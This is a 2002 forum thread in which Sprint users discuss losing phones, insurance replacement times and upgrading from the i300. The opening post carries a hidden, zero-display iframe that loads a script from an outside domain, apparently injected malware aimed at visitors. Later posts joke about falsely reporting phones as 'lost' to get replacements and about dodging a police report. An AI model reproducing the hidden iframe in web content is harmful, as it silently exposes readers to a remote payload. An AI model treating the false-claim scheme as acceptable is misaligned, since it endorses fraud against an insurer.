+ Reply to Thread
    art

just lost my phone

Well I just lost my $500 phone. Ouch! Anyone know how long it takes for sprint insurance to send out a new one? This really hurts!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Napoleon Bonaparte Jr.

Hello

Usially 24 hours after you call Sprint .

By the way , its only one reason why I am still with Sprint .

I want to exchange my I-300 for Thera 2032 (when avalable )

And I,ll be more secure with Sprint Equipment Replacement

Program . I never lost my I-300 but I want to feel free

with $800 device .

I lost my phone yesterday as well. Fortunatly I was at a Verizon store, and they possibly might have it. I am waiting on contact back from them....

If it is lost, is it possible to upgrade to a Treo? Is it worth it? How much is the I300 worth to sprint?

Edit: The manager at Verizon took my phone home with him. He didn't want it to turn up missing.... I hope he didn't open splash photo. My g/f could kill me....
    Last edited by mk3racer; 08-12-2002 at 11:05 AM.

i300 knucklehead
    Wonder when Sprint will be completely out of i300's. That will be the day I accidentally leave my phone on the bus...

Administrator

Arrow

Originally posted by mk3racer
    I lost my phone yesterday as well. Fortunatly I was at a Verizon store, and they possibly might have it. I am waiting on contact back from them....

If it is lost, is it possible to upgrade to a Treo? Is it worth it? How much is the I300 worth to sprint?

Edit: The manager at Verizon took my phone home with him. He didn't want it to turn up missing.... I hope he didn't open splash photo. My g/f could kill me....
    i doubt you can do that so soon upon the treos release. they stil have quite a few i300's im sure.

we have a few posts on the treo here that are just a few threads up.

hmm.... id like to see those splasphotos...

Art, let us now how long it took you to get another phone. I wanna know what to expect when I "lose" mine... I think I may "lose" it when Sprint runs out of I300s.

art

will let you know

Today I bought a cheap $30 refurbished phone just to get me by. As soon as the I300 arrives I shall let you know. They said up to 5 days. I couldnt be without a phone for that long. Ill keep you posted

art

got my phone

well I just got my phone. I called them on monday at 7 am and I got the phone on tuesday by 10am. Looks new too. It came in a refurbished box but there is no refurbished sticker on the phone. Looks like they still have plenty of these phones.

Damn, I'm impressed. I didn't think they'd give you a new one. Did you call the Equipment Replacement Program at 1-800-548-3666? Did they hassle you at all? I'm just curious cuz I'm thinking of "losing" my phone too, and I wanna know what to expect.

art

lost phone

No hassles really but I got the impression they didnt like me, lol. They asked me if I had a police report, I said no, then they told me as a curtecy they would wave the requirment for the police report and send me out a phone. She wasnt very freindly though.
    5-10 min conversation and that was it. Oh and yes I did call the equipment replacment program

Cool, thanks Art. Maybe I'll say I "lost" it instead so that they don't ask about the police report